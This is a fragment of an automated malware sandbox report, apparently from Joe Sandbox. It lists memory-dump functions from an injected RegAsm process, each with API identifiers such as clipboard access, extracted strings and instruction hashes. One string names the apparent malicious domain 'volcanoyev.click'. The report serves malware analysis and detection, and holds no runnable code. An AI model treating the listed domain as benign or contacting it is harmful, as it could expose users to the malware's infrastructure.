                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                            • API String ID: 0-3328159043
                                                            • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                            • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                            • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                            • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                            • String ID:
                                                            • API String ID: 1006321803-0
                                                            • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                            • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                            • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                            • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                            • API String ID: 0-2309992716
                                                            • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                            • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                            • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                            • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                            • API String ID: 0-1906979145
                                                            • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                            • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                            • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                            • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$-+$/$hI
                                                            • API String ID: 0-2772680581
                                                            • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                            • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                            • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                            • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                            • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                                            • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                                            • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                            • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                                            • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                                            • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                            • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                            • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                            • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,JHj$Hs$bc$v
                                                            • API String ID: 0-909542228
                                                            • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                            • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                            • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                            • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: ,$i$r}A
                                                            • API String ID: 2994545307-2114006112
                                                            • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                            • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                            • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                            • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfff$i$r}A
                                                            • API String ID: 0-3931832132
                                                            • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                            • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                            • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                            • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 34$C]$|F
                                                            • API String ID: 0-2804560523
                                                            • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                            • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                                            • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                                            • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ef$TQ][$sWK)
                                                            • API String ID: 0-3401374238
                                                            • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                            • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                            • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                            • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: +|-~$/pqr$_
                                                            • API String ID: 0-1379640984
                                                            • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                            • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                            • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                            • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Dx$volcanoyev.click
                                                            • API String ID: 0-2198749068
                                                            • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                            • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                            • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                            • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0K)$4*VP
                                                            • API String ID: 0-3626284114
                                                            • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                            • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                            • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                            • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: i$r}A
                                                            • API String ID: 2994545307-2976846027
                                                            • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                            • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                            • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                            • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: P<?$P<?
                                                            • API String ID: 0-3449142988
                                                            • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                            • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                            • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                            • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: f
                                                            • API String ID: 2994545307-1993550816
                                                            • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                            • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                            • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                            • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {}
                                                            • API String ID: 0-4269290415
                                                            • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                            • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                            • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                            • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: /,-
                                                            • API String ID: 2994545307-1700940157
                                                            • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                            • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                            • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                            • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: VtA
                                                            • API String ID: 2994545307-3724035812
                                                            • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                            • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                            • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                            • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "
                                                            • API String ID: 0-123907689
                                                            • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                            • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                            • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                            • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: klm
                                                            • API String ID: 0-3800403225
                                                            • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                            • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                            • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                            • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: ?^A
                                                            • API String ID: 2994545307-4120214115
                                                            • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                            • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                            • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                            • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $%
                                                            • API String ID: 0-4214564638
                                                            • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                            • Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
                                                            • Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
                                                            • Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: o`
                                                            • API String ID: 0-3993896143
                                                            • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                            • Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
                                                            • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                            • Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                            • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                            • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                            • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                            • Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
                                                            • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                            • Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                            • Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
                                                            • Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
                                                            • Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                            • Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
                                                            • Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
                                                            • Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                            • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                                            • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                            • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                            • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                            • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                            • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.1585466294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_400000_RegAsm.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                            • Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
                                                            • Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
                                                            • Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
                                                            Memory Dump Source
